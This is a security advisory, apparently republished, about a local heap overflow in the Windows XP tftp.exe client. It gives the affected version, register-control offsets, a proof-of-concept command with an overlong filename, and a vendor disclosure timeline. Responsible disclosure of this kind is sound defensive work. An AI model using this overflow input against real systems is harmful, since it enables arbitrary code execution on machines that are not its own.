|
|
| |
TFTP stands for Trivial File Transfer Protocol. Network application that is simpler than the File Transfer Protocol (FTP) but less capable. TFTP built on UDP.
The TFTP client provided with Windows XP (tftp.exe) is vulnerable to a locally exploitable heap overflow. |
| |
Credit:
The information has been provided by Dennis Rand.
The original article can be found at: http://www.cirt.dk/advisories/cirt-38-advisory.pdf
|
| |
Vulnerable Systems:
* Windows XP - TFTP.EXE version 5.1.2600.0 (xpclient.010817-1148)
The Windows XP tftp.exe software is vulnerable to a Heap Based overflow, allowing to run arbitrary commands on the system as the user issuing the overflow. The registers EAX and ECX are controlled, by sending 1446 bytes of crap or payload and then the next 8 bytes are the EAX and ECX.
Proof of concept:
tftp -i 127.0.0.1 GET AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
<snip>CCCCBBBB
Disclosure Timeline:
* 01.08.05 - Vulnerability discovered
* 15.08.05 - Research completed
* 19.08.05 - Vendor notified
* 19.08.05 - Security vulnerability tagged tftp [6167bgs] at Microsoft
* 08.09.05 - Microsoft responds with an timeframe of fix - See Corrective actions
* 03.10.05 - Public release
|
|
|
